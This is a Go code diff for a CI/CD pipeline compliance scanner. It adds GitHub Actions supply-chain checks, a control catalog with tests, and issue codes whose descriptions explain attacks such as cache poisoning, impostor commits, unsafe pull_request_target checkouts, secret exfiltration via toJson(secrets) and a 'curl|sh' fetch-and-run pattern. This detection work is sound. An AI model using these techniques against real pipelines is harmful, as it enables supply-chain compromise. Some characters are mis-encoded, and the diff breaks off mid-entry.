// ControlsConfig holds configuration for all controls
@@ -140,6 +171,32 @@ type ControlsConfig struct {
// PipelineMustNotUseDockerInDocker control configuration
PipelineMustNotUseDockerInDocker *DockerInDockerControlConfig `yaml:"pipelineMustNotUseDockerInDocker,omitempty"`
+
+ // ActionsMustBePinnedByCommitSha control configuration (GitHub Actions only)
+ ActionsMustBePinnedByCommitSha *ActionsPinnedByShaControlConfig `yaml:"actionsMustBePinnedByCommitSha,omitempty"`
+}
+
// ActionsPinnedByShaControlConfig configures the GitHub Actions supply-
// chain pinning check (ISSUE-104). Only meaningful on GitHub workflows.
type ActionsPinnedByShaControlConfig struct {
	// Enabled controls whether this check runs
	Enabled *bool `yaml:"enabled,omitempty"`

	// TrustedOwners lists action-owner prefixes that are exempt from the
	// pin-by-SHA requirement. Only owners inside the workflow's existing
	// trust boundary should be listed here; "actions" and "github"
	// cover the first-party GitHub-owned actions the runtime trusts
	// implicitly. Adding a third-party owner here re-opens the exact
	// supply-chain risk the check exists to close.
	TrustedOwners []string `yaml:"trustedOwners,omitempty"`
}

// IsEnabled reports whether the control is enabled. A nil receiver or
// an unset Enabled field counts as disabled.
func (c *ActionsPinnedByShaControlConfig) IsEnabled() bool {
	return c != nil && c.Enabled != nil && *c.Enabled
}
// ImageForbiddenTagsControlConfig configuration for the forbidden image tags control
diff --git a/configuration/plumberconfig_test.go b/configuration/plumberconfig_test.go
index 4a57aed..96c4780 100644
--- a/configuration/plumberconfig_test.go
+++ b/configuration/plumberconfig_test.go
@@ -318,6 +318,7 @@ func TestValidControlNames(t *testing.T) {
names := ValidControlNames()
expected := []string{
+ "actionsMustBePinnedByCommitSha",
"branchMustBeProtected",
"containerImageMustComeFromAuthorizedSources",
"containerImageMustNotUseForbiddenTags",
diff --git a/control/catalog.go b/control/catalog.go
new file mode 100644
index 0000000..b809d13
--- /dev/null
+++ b/control/catalog.go
@@ -0,0 +1,230 @@
+package control
+
+import (
+ "github.com/getplumber/plumber/configuration"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
+)
+
// ControlEntry is the canonical per-control view consumed by the
// analyze renderer, the MR comment builder and any future output path.
// Compliance is derived from the Rego Findings list (binary: 100 when
// no finding matches the ControlName, 0 when at least one does);
// Skipped reflects whether the user disabled the control in
// .plumber.yaml. DisplayName is the user-facing title.
type ControlEntry struct {
	// DisplayName is the human-readable control title shown in output.
	DisplayName string
	// ControlName is the .plumber.yaml key identifying the control.
	ControlName string
	// Skipped is true when the user disabled the control in config.
	Skipped bool
	// Compliance is the binary score (100 or 0) set by ApplyFindings.
	Compliance float64
}
+
// GitLabControls returns the catalog of GitLab compliance controls in
// their canonical display order.
//
// NOTE(review): each append below is guarded by a nil check, so an
// entry is only emitted when its section is present in the loaded
// config — a control absent from .plumber.yaml produces no entry at
// all. If the full catalog is expected regardless, the caller must
// ensure the loaded config populates every section (e.g. by merging
// embedded defaults) — confirm against the config loader.
//
// The caller typically fills in the findings-derived compliance by
// looking up FindingsByControl (see ApplyFindings).
func GitLabControls(pc *configuration.PlumberConfig) []ControlEntry {
	if pc == nil {
		return nil
	}
	c := &pc.Controls
	// Capacity 14 matches the number of GitLab controls handled below.
	entries := make([]ControlEntry, 0, 14)

	// Container images must not use forbidden tags. The display name
	// is specialized when the config additionally requires digest pins.
	if cfg := c.ContainerImageMustNotUseForbiddenTags; cfg != nil {
		name := "Container images must not use forbidden tags"
		if cfg.IsPinnedByDigestRequired() {
			name = "Container images must not use forbidden tags (pinned by digest)"
		}
		entries = append(entries, ControlEntry{
			DisplayName: name,
			ControlName: "containerImageMustNotUseForbiddenTags",
			Skipped:     !cfg.IsEnabled(),
		})
	}
	if cfg := c.ContainerImageMustComeFromAuthorizedSources; cfg != nil {
		entries = append(entries, ControlEntry{
			DisplayName: "Container images must come from authorized sources",
			ControlName: "containerImageMustComeFromAuthorizedSources",
			Skipped:     !cfg.IsEnabled(),
		})
	}
	if cfg := c.BranchMustBeProtected; cfg != nil {
		entries = append(entries, ControlEntry{
			DisplayName: "Branch must be protected",
			ControlName: "branchMustBeProtected",
			Skipped:     !cfg.IsEnabled(),
		})
	}
	if cfg := c.PipelineMustNotIncludeHardcodedJobs; cfg != nil {
		entries = append(entries, ControlEntry{
			DisplayName: "Pipeline must not include hardcoded jobs",
			ControlName: "pipelineMustNotIncludeHardcodedJobs",
			Skipped:     !cfg.IsEnabled(),
		})
	}
	if cfg := c.IncludesMustBeUpToDate; cfg != nil {
		entries = append(entries, ControlEntry{
			DisplayName: "Includes must be up to date",
			ControlName: "includesMustBeUpToDate",
			Skipped:     !cfg.IsEnabled(),
		})
	}
	if cfg := c.IncludesMustNotUseForbiddenVersions; cfg != nil {
		entries = append(entries, ControlEntry{
			DisplayName: "Includes must not use forbidden versions",
			ControlName: "includesMustNotUseForbiddenVersions",
			Skipped:     !cfg.IsEnabled(),
		})
	}
	if cfg := c.PipelineMustIncludeComponent; cfg != nil {
		entries = append(entries, ControlEntry{
			DisplayName: "Pipeline must include required components",
			ControlName: "pipelineMustIncludeComponent",
			Skipped:     !cfg.IsEnabled(),
		})
	}
	if cfg := c.PipelineMustIncludeTemplate; cfg != nil {
		entries = append(entries, ControlEntry{
			DisplayName: "Pipeline must include required templates",
			ControlName: "pipelineMustIncludeTemplate",
			Skipped:     !cfg.IsEnabled(),
		})
	}
	if cfg := c.PipelineMustNotEnableDebugTrace; cfg != nil {
		entries = append(entries, ControlEntry{
			DisplayName: "Pipeline must not enable debug trace",
			ControlName: "pipelineMustNotEnableDebugTrace",
			Skipped:     !cfg.IsEnabled(),
		})
	}
	if cfg := c.PipelineMustNotUseUnsafeVariableExpansion; cfg != nil {
		entries = append(entries, ControlEntry{
			DisplayName: "Pipeline must not use unsafe variable expansion",
			ControlName: "pipelineMustNotUseUnsafeVariableExpansion",
			Skipped:     !cfg.IsEnabled(),
		})
	}
	if cfg := c.SecurityJobsMustNotBeWeakened; cfg != nil {
		entries = append(entries, ControlEntry{
			DisplayName: "Security jobs must not be weakened",
			ControlName: "securityJobsMustNotBeWeakened",
			Skipped:     !cfg.IsEnabled(),
		})
	}
	if cfg := c.PipelineMustNotExecuteUnverifiedScripts; cfg != nil {
		entries = append(entries, ControlEntry{
			DisplayName: "Pipeline must not execute unverified scripts",
			ControlName: "pipelineMustNotExecuteUnverifiedScripts",
			Skipped:     !cfg.IsEnabled(),
		})
	}
	if cfg := c.PipelineMustNotOverrideJobVariables; cfg != nil {
		entries = append(entries, ControlEntry{
			DisplayName: "Pipeline must not override job variables",
			ControlName: "pipelineMustNotOverrideJobVariables",
			Skipped:     !cfg.IsEnabled(),
		})
	}
	if cfg := c.PipelineMustNotUseDockerInDocker; cfg != nil {
		entries = append(entries, ControlEntry{
			DisplayName: "Pipeline must not use Docker-in-Docker",
			ControlName: "pipelineMustNotUseDockerInDocker",
			Skipped:     !cfg.IsEnabled(),
		})
	}
	return entries
}
+
// DisabledControlNames returns the set of control names the user has
// explicitly disabled in .plumber.yaml (controls present in the config
// with `enabled: false`). Controls absent from the config are NOT
// included — they fall back to the embedded default which has them
// enabled. The nil-before-IsEnabled guards keep "section absent" and
// "section present but disabled" distinct. Unlike GitLabControls,
// this list also covers GitHub-only controls
// (actionsMustBePinnedByCommitSha); keep it in sync when adding a
// control.
func DisabledControlNames(pc *configuration.PlumberConfig) map[string]bool {
	out := map[string]bool{}
	if pc == nil {
		return out
	}
	c := &pc.Controls
	if cfg := c.ContainerImageMustNotUseForbiddenTags; cfg != nil && !cfg.IsEnabled() {
		out["containerImageMustNotUseForbiddenTags"] = true
	}
	if cfg := c.ContainerImageMustComeFromAuthorizedSources; cfg != nil && !cfg.IsEnabled() {
		out["containerImageMustComeFromAuthorizedSources"] = true
	}
	if cfg := c.BranchMustBeProtected; cfg != nil && !cfg.IsEnabled() {
		out["branchMustBeProtected"] = true
	}
	if cfg := c.PipelineMustNotIncludeHardcodedJobs; cfg != nil && !cfg.IsEnabled() {
		out["pipelineMustNotIncludeHardcodedJobs"] = true
	}
	if cfg := c.IncludesMustBeUpToDate; cfg != nil && !cfg.IsEnabled() {
		out["includesMustBeUpToDate"] = true
	}
	if cfg := c.IncludesMustNotUseForbiddenVersions; cfg != nil && !cfg.IsEnabled() {
		out["includesMustNotUseForbiddenVersions"] = true
	}
	if cfg := c.PipelineMustIncludeComponent; cfg != nil && !cfg.IsEnabled() {
		out["pipelineMustIncludeComponent"] = true
	}
	if cfg := c.PipelineMustIncludeTemplate; cfg != nil && !cfg.IsEnabled() {
		out["pipelineMustIncludeTemplate"] = true
	}
	if cfg := c.PipelineMustNotEnableDebugTrace; cfg != nil && !cfg.IsEnabled() {
		out["pipelineMustNotEnableDebugTrace"] = true
	}
	if cfg := c.PipelineMustNotUseUnsafeVariableExpansion; cfg != nil && !cfg.IsEnabled() {
		out["pipelineMustNotUseUnsafeVariableExpansion"] = true
	}
	if cfg := c.SecurityJobsMustNotBeWeakened; cfg != nil && !cfg.IsEnabled() {
		out["securityJobsMustNotBeWeakened"] = true
	}
	if cfg := c.PipelineMustNotExecuteUnverifiedScripts; cfg != nil && !cfg.IsEnabled() {
		out["pipelineMustNotExecuteUnverifiedScripts"] = true
	}
	if cfg := c.PipelineMustNotOverrideJobVariables; cfg != nil && !cfg.IsEnabled() {
		out["pipelineMustNotOverrideJobVariables"] = true
	}
	if cfg := c.PipelineMustNotUseDockerInDocker; cfg != nil && !cfg.IsEnabled() {
		out["pipelineMustNotUseDockerInDocker"] = true
	}
	if cfg := c.ActionsMustBePinnedByCommitSha; cfg != nil && !cfg.IsEnabled() {
		out["actionsMustBePinnedByCommitSha"] = true
	}
	return out
}
+
+// FilterFindingsByEnabledControls drops findings whose ControlName is
+// disabled in pc. Findings whose code is unknown or has no ControlName
+// are kept (defensive: better surfaced than silently swallowed).
+func FilterFindingsByEnabledControls(findings []opaengine.Finding, pc *configuration.PlumberConfig) []opaengine.Finding {
+ disabled := DisabledControlNames(pc)
+ if len(disabled) == 0 {
+ return findings
+ }
+ out := make([]opaengine.Finding, 0, len(findings))
+ for _, f := range findings {
+ info := LookupCode(ErrorCode(f.Code))
+ if info != nil && info.ControlName != "" && disabled[info.ControlName] {
+ continue
+ }
+ out = append(out, f)
+ }
+ return out
+}
+
+// ApplyFindings fills in Compliance for each catalog entry based on
+// whether any finding matches its ControlName. The rule is binary: 100
+// when the control fires no finding (or is skipped), 0 otherwise.
+func ApplyFindings(entries []ControlEntry, findingsByControl map[string]int) []ControlEntry {
+ out := make([]ControlEntry, len(entries))
+ for i, e := range entries {
+ e.Compliance = 100.0
+ if !e.Skipped && findingsByControl[e.ControlName] > 0 {
+ e.Compliance = 0.0
+ }
+ out[i] = e
+ }
+ return out
+}
diff --git a/control/catalog_test.go b/control/catalog_test.go
new file mode 100644
index 0000000..61385a7
--- /dev/null
+++ b/control/catalog_test.go
@@ -0,0 +1,51 @@
+package control
+
+import (
+ "testing"
+
+ "github.com/getplumber/plumber/configuration"
+ opaengine "github.com/getplumber/plumber/internal/engine/opa"
+)
+
+func TestFilterFindingsByEnabledControls_dropsDisabledControlFindings(t *testing.T) {
+ disabled := false
+ enabled := true
+ pc := &configuration.PlumberConfig{
+ Controls: configuration.ControlsConfig{
+ ContainerImageMustNotUseForbiddenTags: &configuration.ImageForbiddenTagsControlConfig{
+ Enabled: &disabled,
+ },
+ BranchMustBeProtected: &configuration.BranchProtectionControlConfig{
+ Enabled: &enabled,
+ },
+ },
+ }
+
+ findings := []opaengine.Finding{
+ {Code: string(CodeImageNotPinnedByDigest), Severity: "high"},
+ {Code: string(CodeImageForbiddenTag), Severity: "medium"},
+ {Code: string(CodeBranchUnprotected), Severity: "critical"},
+ {Code: "ISSUE-9999", Severity: "low"}, // unknown, must be kept
+ }
+
+ out := FilterFindingsByEnabledControls(findings, pc)
+ if len(out) != 2 {
+ t.Fatalf("expected 2 findings, got %d: %+v", len(out), out)
+ }
+ for _, f := range out {
+ if f.Code == string(CodeImageNotPinnedByDigest) || f.Code == string(CodeImageForbiddenTag) {
+ t.Fatalf("disabled control finding leaked through: %+v", f)
+ }
+ }
+}
+
+func TestFilterFindingsByEnabledControls_noConfigKeepsAll(t *testing.T) {
+ findings := []opaengine.Finding{
+ {Code: string(CodeImageNotPinnedByDigest), Severity: "high"},
+ {Code: string(CodeBranchUnprotected), Severity: "critical"},
+ }
+ out := FilterFindingsByEnabledControls(findings, nil)
+ if len(out) != len(findings) {
+ t.Fatalf("expected all findings preserved when pc is nil, got %d", len(out))
+ }
+}
diff --git a/control/codes.go b/control/codes.go
index e051642..da39a25 100644
--- a/control/codes.go
+++ b/control/codes.go
@@ -25,6 +25,30 @@ const (
CodeImageForbiddenTag ErrorCode = "ISSUE-102"
// ISSUE-103: Container image is not pinned by digest
CodeImageNotPinnedByDigest ErrorCode = "ISSUE-103"
+ // ISSUE-104: Third-party GitHub Action reference is not pinned by commit SHA
+ CodeActionUnpinned ErrorCode = "ISSUE-104"
+ // ISSUE-105: Container registry password is hard-coded in the workflow
+ CodeContainerHardcodedCredentials ErrorCode = "ISSUE-105"
+ // ISSUE-106: Release/publish workflow primes a build cache from attacker-controlled artifacts
+ CodeCachePoisoning ErrorCode = "ISSUE-106"
+ // ISSUE-108: Action is hosted in an archived GitHub repository
+ CodeActionArchivedRepo ErrorCode = "ISSUE-108"
+ // ISSUE-109: Pinned commit SHA does not exist in the action's upstream repository
+ CodeImpostorCommit ErrorCode = "ISSUE-109"
+ // ISSUE-110: `# vX.Y.Z` comment does not match the SHA the ref resolves to
+ CodeRefVersionMismatch ErrorCode = "ISSUE-110"
+ // ISSUE-111: Action pinned by SHA is stale vs the latest upstream release
+ CodeStaleActionRef ErrorCode = "ISSUE-111"
+ // ISSUE-113: Symbolic ref collides with both a tag and a branch upstream
+ CodeRefConfusion ErrorCode = "ISSUE-113"
+ // ISSUE-114: Action version carries a published security advisory
+ CodeKnownVulnerableAction ErrorCode = "ISSUE-114"
+ // ISSUE-115: Third-party action duplicates a runner built-in (gh CLI, etc.)
+ CodeSuperfluousAction ErrorCode = "ISSUE-115"
+ // ISSUE-107: Dockerfile FROM reference is not pinned by digest
+ CodeDockerfileUnpinnedBase ErrorCode = "ISSUE-107"
+ // ISSUE-112: Release / publish workflow produces unsigned artefacts
+ CodeReleaseWorkflowUnsigned ErrorCode = "ISSUE-112"
)
// Issue codes for CI/CD variable controls (2xx)
@@ -35,6 +59,44 @@ const (
CodeUnsafeVariableExpansion ErrorCode = "ISSUE-204"
// ISSUE-205: A variable that should only be set in CI/CD Settings is overridden in the pipeline config
CodeJobVariableOverridden ErrorCode = "ISSUE-205"
+ // ISSUE-206: Workflow inlines user-controlled template expressions into a run: script
+ CodeTemplateInjection ErrorCode = "ISSUE-206"
+ // ISSUE-208: Workflow re-enables deprecated GitHub Actions workflow commands
+ CodeInsecureCommands ErrorCode = "ISSUE-208"
+ // ISSUE-209: Workflow writes untrusted content to $GITHUB_ENV or $GITHUB_PATH
+ CodeGitHubEnvInjection ErrorCode = "ISSUE-209"
+ // ISSUE-210: Workflow gates behaviour on a spoofable actor/bot check
+ CodeBotConditions ErrorCode = "ISSUE-210"
+ // ISSUE-211: Workflow `if:` condition is logically unsound (always true/false, tautology)
+ CodeUnsoundCondition ErrorCode = "ISSUE-211"
+ // ISSUE-212: Workflow misuses the `contains()` built-in (argument order, type)
+ CodeUnsoundContains ErrorCode = "ISSUE-212"
+ // ISSUE-215: Workflow expands a `vars.*` template into a shell script
+ CodeTemplateInjectionVars ErrorCode = "ISSUE-215"
+ // ISSUE-213: Workflow exports the whole `github` context via toJson(github)
+ CodeUnsafeGithubContextDump ErrorCode = "ISSUE-213"
+ // ISSUE-214: Workflow installs a package without pinning a version / lockfile
+ CodeUnpinnedPackageInstall ErrorCode = "ISSUE-214"
+)
+
// Issue codes for secret and credential handling controls (3xx).
// Codes are stable public identifiers; never renumber or reuse them.
const (
	// ISSUE-301: Workflow exfiltrates the entire secrets context via toJson(secrets)
	CodeOverprovisionedSecrets ErrorCode = "ISSUE-301"
	// ISSUE-302: Reusable workflow called with `secrets: inherit`
	CodeSecretsInherit ErrorCode = "ISSUE-302"
	// ISSUE-303: Secret dereferenced via fromJSON bypasses log redaction
	CodeUnredactedSecrets ErrorCode = "ISSUE-303"
	// ISSUE-304: Workflow grants no explicit permissions, relying on the repo default
	CodeUndocumentedPermissions ErrorCode = "ISSUE-304"
	// ISSUE-305: Secret used without an environment gate
	CodeSecretsOutsideEnv ErrorCode = "ISSUE-305"
	// ISSUE-306: GitHub App token issued with revocation disabled
	CodeGitHubAppSkipRevoke ErrorCode = "ISSUE-306"
	// ISSUE-307: Checkout persists credentials in .git/config (artipacked)
	CodeArtipacked ErrorCode = "ISSUE-307"
	// ISSUE-308: Workflow reads a secret via a dynamic index (secrets[expr])
	CodeSecretsDynamicIndex ErrorCode = "ISSUE-308"
)
// Issue codes for pipeline composition controls (4xx)
@@ -61,6 +123,34 @@ const (
CodeDockerInDockerUsage ErrorCode = "ISSUE-412"
// ISSUE-413: CI/CD job uses Docker-in-Docker with insecure daemon configuration
CodeDockerInDockerInsecure ErrorCode = "ISSUE-413"
+ // ISSUE-414: Workflow subscribes to a dangerous trigger (pull_request_target, workflow_run)
+ CodeDangerousTriggers ErrorCode = "ISSUE-414"
+ // ISSUE-415: pull_request_target workflow explicitly checks out the PR head (tj-actions pattern)
+ CodePullRequestTargetWithHeadCheckout ErrorCode = "ISSUE-415"
+)
+
+// Issue codes for workflow-hygiene controls (6xx)
+const (
+ // ISSUE-601: Workflow has no explicit `name:` field
+ CodeAnonymousDefinition ErrorCode = "ISSUE-601"
+ // ISSUE-602: Workflow has no `concurrency:` block at either level (workflow or job)
+ CodeMissingConcurrency ErrorCode = "ISSUE-602"
+ // ISSUE-603: Workflow uses a misfeature pattern (shell: cmd, inline pip install curl|sh, …)
+ CodeWorkflowMisfeature ErrorCode = "ISSUE-603"
+ // ISSUE-604: Workflow script contains obfuscation (zero-width / non-ASCII unicode, bidi controls)
+ CodeWorkflowObfuscation ErrorCode = "ISSUE-604"
+ // ISSUE-605: PyPI / npm publish relies on a static token instead of OIDC trusted publishing
+ CodeUseTrustedPublishing ErrorCode = "ISSUE-605"
+ // ISSUE-606: dependabot.yml re-enables insecure external code execution
+ CodeDependabotInsecureExec ErrorCode = "ISSUE-606"
+ // ISSUE-607: dependabot.yml update ecosystem has no cooldown window
+ CodeDependabotMissingCooldown ErrorCode = "ISSUE-607"
+ // ISSUE-608: Repository has workflows but no dependency update tool configured
+ CodeDependencyUpdateToolMissing ErrorCode = "ISSUE-608"
+ // ISSUE-609: Repository has workflows but none runs a SAST scanner
+ CodeSASTWorkflowMissing ErrorCode = "ISSUE-609"
+ // ISSUE-610: Repository has workflows but no SECURITY.md policy file
+ CodeSecurityPolicyMissing ErrorCode = "ISSUE-610"
+)
// Issue codes for access and authorization controls (5xx)
@@ -69,6 +159,8 @@ const (
CodeBranchUnprotected ErrorCode = "ISSUE-501"
// ISSUE-505: Branch has non-compliant protection settings
CodeBranchNonCompliant ErrorCode = "ISSUE-505"
+ // ISSUE-509: Job runs with overly broad permissions (write-all)
+ CodeExcessivePermissions ErrorCode = "ISSUE-509"
)
// ErrorCodeInfo provides metadata about an issue code.
@@ -119,6 +211,114 @@ var errorCodeRegistry = map[ErrorCode]ErrorCodeInfo{
DocURL: docsBaseURL + string(CodeImageNotPinnedByDigest),
ControlName: "containerImageMustNotUseForbiddenTags",
},
+ CodeActionUnpinned: {
+ Code: CodeActionUnpinned,
+ Severity: SeverityHigh,
+ Title: "Third-party action reference is not pinned by commit SHA",
+ Description: "A GitHub Actions workflow references a third-party action with a mutable ref (tag or branch) instead of a 40-character commit SHA. Tag and branch refs can be reassigned by the action's maintainer β or by an attacker who compromises the action's repository β to point at arbitrary code, which then runs inside the caller workflow with its secrets. The March 2025 tj-actions/changed-files compromise (CVE-2025-30066) propagated this way to hundreds of repositories, including aquasecurity/trivy.",
+ Remediation: "Replace `uses: owner/action@v4` with `uses: owner/action@<40-char-sha>` and add a `# vX.Y.Z` comment to document the version. Tools like Dependabot's `version-update-strategy: sha-and-version` can automate the update flow. Official GitHub-owned actions (actions/*, github/*) can be excluded if they are in the workflow's trusted boundary.",
+ DocURL: docsBaseURL + string(CodeActionUnpinned),
+ ControlName: "actionsMustBePinnedByCommitSha",
+ },
+ CodeCachePoisoning: {
+ Code: CodeCachePoisoning,
+ Severity: SeverityHigh,
+ Title: "Release/publish workflow may consume a poisoned build cache",
+ Description: "A release, tag or publish workflow uses `actions/cache@*` (or an equivalent cache action) without scoping the cache key to the ref being released. Caches on GitHub Actions are shared across branches according to the fallback rules: a malicious PR run on a feature branch can populate the same cache key that the release job later restores, silently injecting compiled artefacts, dependencies, or build scripts into the published output. Past supply-chain incidents have abused exactly this fallback to publish compromised packages to PyPI and npm.",
+ Remediation: "Either disable the cache entirely on release/publish jobs, or scope the `key:` to the ref being released (e.g. `key: release-${{ github.ref_name }}-${{ hashFiles('**/go.sum') }}`) without a `restore-keys:` fallback that reaches into PR-populated entries. Verify artefacts against a checksum after restoring.",
+ DocURL: docsBaseURL + string(CodeCachePoisoning),
+ ControlName: "releaseWorkflowsMustNotRestoreUntrustedCache",
+ },
+ CodeActionArchivedRepo: {
+ Code: CodeActionArchivedRepo,
+ Severity: SeverityHigh,
+ Title: "Action is hosted in an archived repository",
+ Description: "A GitHub Actions workflow references an action whose upstream repository is archived. Archived repos no longer receive maintenance β security fixes, dependency bumps, compatibility patches all stop β and any existing vulnerability stays open forever. A new SHA can still be pushed by the last maintainer, so even pinning by SHA does not make the reference safe against a future takeover.",
+ Remediation: "Replace the action with a maintained fork (audit the fork's owner first) or with an equivalent step implemented inline. If the behaviour is trivial, inlining the shell logic avoids the supply-chain dependency entirely.",
+ DocURL: docsBaseURL + string(CodeActionArchivedRepo),
+ ControlName: "actionsMustNotBeArchived",
+ },
+ CodeImpostorCommit: {
+ Code: CodeImpostorCommit,
+ Severity: SeverityCritical,
+ Title: "Pinned commit SHA does not belong to the action's repository",
+ Description: "A workflow pins an action to a commit SHA that does not resolve in the action's upstream repository. That means either the SHA was mistyped (the reference silently runs whatever tag/branch GitHub falls back to, typically the default branch) or β far worse β the author was tricked by a PR comment / stargazer dashboard showing a detached commit that was never merged upstream. The name-and-SHA combination is the precise form of the `impostor commit` attack documented in academic supply-chain literature.",
+ Remediation: "Replace the reference with a SHA that actually belongs to the action's repository. Use `gh api repos/OWNER/REPO/commits/SHA` to verify before committing the change.",
+ DocURL: docsBaseURL + string(CodeImpostorCommit),
+ ControlName: "actionRefsMustExistUpstream",
+ },
+ CodeRefVersionMismatch: {
+ Code: CodeRefVersionMismatch,
+ Severity: SeverityMedium,
+ Title: "`# vX.Y.Z` comment does not match the SHA",
+ Description: "A workflow pins an action by commit SHA and adds a trailing `# vX.Y.Z` comment to document the intended version, but the SHA does not correspond to the tag named in the comment. Reviewers scanning diffs trust that annotation and miss the discrepancy, so silent downgrades (or upgrades that claim to be a patch) slip through review unnoticed.",
+ Remediation: "Either update the SHA to the one the tag points at, or update the comment to the tag that actually corresponds to the SHA. `gh api repos/OWNER/REPO/git/ref/tags/TAG` returns the SHA the tag resolves to.",
+ DocURL: docsBaseURL + string(CodeRefVersionMismatch),
+ ControlName: "actionPinCommentsMustMatchSha",
+ },
+ CodeStaleActionRef: {
+ Code: CodeStaleActionRef,
+ Severity: SeverityLow,
+ Title: "Action pin is behind the latest upstream release",
+ Description: "A workflow pins an action to a commit SHA that predates the repository's most recent release. The SHA may still work today, but it is missing security fixes, dependency updates, and runtime compatibility changes shipped in later releases. Dependabot's `version-update-strategy: sha-and-version` handles the upgrade loop once configured.",
+ Remediation: "Update the pin to the SHA of the latest release, and refresh the trailing `# vX.Y.Z` comment. Enable Dependabot with `package-ecosystem: github-actions` and `version-update-strategy: sha-and-version` to keep the pins fresh automatically.",
+ DocURL: docsBaseURL + string(CodeStaleActionRef),
+ ControlName: "actionPinsMustNotBeStale",
+ },
+ CodeRefConfusion: {
+ Code: CodeRefConfusion,
+ Severity: SeverityMedium,
+ Title: "Action ref name collides with both a tag and a branch",
+ Description: "A workflow pins an action to a name that exists upstream **as both a tag and a branch** (classic case: a tag `v1` kept in parallel with a branch `v1`). GitHub Actions resolves tags first, so today the workflow runs the tagged commit β but a maintainer rename, a pipeline typo, or a CI parameter that drops a character can switch the binding to the branch, which tracks every push. The ambiguity makes the reference fundamentally unreliable: the reviewer cannot tell from the YAML alone which of the two upstream revisions will execute.",
+ Remediation: "Replace the ambiguous name with either a 40-character commit SHA (preferred) or a suffix that disambiguates (`refs/tags/v1` vs `refs/heads/v1`). Ask the action maintainer to remove one of the two refs; keeping both is a supply-chain landmine for every caller.",
+ DocURL: docsBaseURL + string(CodeRefConfusion),
+ ControlName: "actionRefsMustNotCollide",
+ },
+ CodeKnownVulnerableAction: {
+ Code: CodeKnownVulnerableAction,
+ Severity: SeverityCritical,
+ Title: "Action version carries a published security advisory",
+ Description: "The pinned version of this action appears in the GitHub Advisory Database under the `actions` ecosystem. Running a workflow on a known-vulnerable action version inherits the published vulnerability class (RCE, secret exfiltration, privilege escalation, depending on the advisory). Examples from history: tj-actions/changed-files (CVE-2025-30066), reviewdog/action-setup with the March 2025 compromise, unpatched releases of `actions/artifact`. This check reports every advisory whose affected-version range covers the pinned ref.",
+ Remediation: "Upgrade the action to a version outside the advisory's affected range (the advisory page lists a fixed-in version). Pin by SHA once upgraded so future retags cannot silently revert the fix. Configure Dependabot with `package-ecosystem: github-actions` to receive PR alerts when new advisories land.",
+ DocURL: docsBaseURL + string(CodeKnownVulnerableAction),
+ ControlName: "actionsMustNotCarryKnownCVEs",
+ },
+ CodeDockerfileUnpinnedBase: {
+ Code: CodeDockerfileUnpinnedBase,
+ Severity: SeverityMedium,
+ Title: "Dockerfile FROM reference is not pinned by digest",
+ Description: "A Dockerfile at the root of the repository (or under a known build directory) uses `FROM image:tag` without a `@sha256:β¦` digest. Tags are mutable at the registry level: an attacker who compromises the registry β or the image maintainer β can re-push the same tag to point at a different layer, silently injecting code into every later build that pulls the reference. The supply chain of the downstream artefact then inherits that substitution. Pinning by digest is the single control that neutralises this vector.",
+ Remediation: "Replace `FROM image:tag` with `FROM image:tag@sha256:β¦`. `docker inspect --format='{{index .RepoDigests 0}}' image:tag` prints the digest for the tag you just pulled. Automate refresh with Dependabot or Renovate (`package-ecosystem: docker`, `version-update-strategy: sha-and-version`) so the pin stays current.",
+ DocURL: docsBaseURL + string(CodeDockerfileUnpinnedBase),
+ ControlName: "dockerfilesMustPinBaseImageByDigest",
+ },
+ CodeReleaseWorkflowUnsigned: {
+ Code: CodeReleaseWorkflowUnsigned,
+ Severity: SeverityMedium,
+ Title: "Release / publish workflow produces unsigned artefacts",
+ Description: "A workflow runs a release or publish action (goreleaser, softprops/action-gh-release, pypa publish, npm-publish, docker build+push) without invoking any signing step. Consumers pulling the released artefact have no cryptographic handle to verify the artefact was built by the expected pipeline rather than tampered with along the way (cache poisoning, compromised runner, repository takeover). Signing (Sigstore cosign, GPG, SLSA provenance) turns 'I trust this came from that repo' into a falsifiable statement.",
+ Remediation: "Add a signing step to the release job: `sigstore/cosign-installer` followed by `cosign sign IMAGE` for container images, `sigstore/gh-action-sigstore-python` for Python wheels, `crazy-max/ghaction-import-gpg` + `gpg --detach-sign` for tarballs, or goreleaser with a `signs:` section configured in .goreleaser.yaml. Publish the `.sig` / `.asc` alongside the artefact in the release assets.",
+ DocURL: docsBaseURL + string(CodeReleaseWorkflowUnsigned),
+ ControlName: "releaseWorkflowsMustSignArtefacts",
+ },
+ CodeSuperfluousAction: {
+ Code: CodeSuperfluousAction,
+ Severity: SeverityLow,
+ Title: "Third-party action duplicates functionality already on the runner",
+ Description: "A workflow uses a third-party action to do something the GitHub-hosted runner already provides out of the box: `gh` CLI operations wrapped by `peter-evans/create-pull-request`, basic cache operations that `actions/cache` already covers, `nick-invision/retry` for a one-line `bash` retry loop. Each extra action is an extra supply-chain dependency for zero capability gain β the sort of reference where an `impostor-commit`, a tag retag, or a compromise of the upstream account buys the attacker a foothold with no functional reason to have taken that risk.",
+ Remediation: "Replace the action with the equivalent inline shell step using the runner's built-in tooling (`gh pr create`, `gh release`, simple `bash` retry loops). Keeps the workflow readable AND removes a supply-chain link. When the capability is non-trivial (artifact caching, matrix fan-out), prefer the official `actions/*` action over a third-party duplicate.",
+ DocURL: docsBaseURL + string(CodeSuperfluousAction),
+ ControlName: "actionsMustNotDuplicateRunnerBuiltins",
+ },
+ CodeContainerHardcodedCredentials: {
+ Code: CodeContainerHardcodedCredentials,
+ Severity: SeverityCritical,
+ Title: "Container registry password is hard-coded in the workflow",
+ Description: "A GitHub Actions workflow sets `jobs.<job_id>.container.credentials.password` to a literal string instead of a `${{ secrets.X }}` reference. The password is committed to the repository's history in plain text; anyone with read access — including the entire public on a public repo — can retrieve it, and rotating it requires rewriting history to purge the leak.",
+ Remediation: "Store the password in a repository, environment, or organization secret and reference it via `${{ secrets.SECRET_NAME }}`. If the password is already exposed in git history, rotate it immediately and purge the literal with `git filter-repo` or a BFG run before re-publishing.",
+ DocURL: docsBaseURL + string(CodeContainerHardcodedCredentials),
+ ControlName: "containerCredentialsMustComeFromSecrets",
+ },
// CI/CD variable controls (2xx)
CodeDebugTraceEnabled: {
@@ -270,6 +470,276 @@ var errorCodeRegistry = map[ErrorCode]ErrorCodeInfo{
DocURL: docsBaseURL + string(CodeBranchNonCompliant),
ControlName: "branchMustBeProtected",
},
+ CodeTemplateInjection: {
+ Code: CodeTemplateInjection,
+ Severity: SeverityCritical,
+ Title: "Template injection in workflow script",
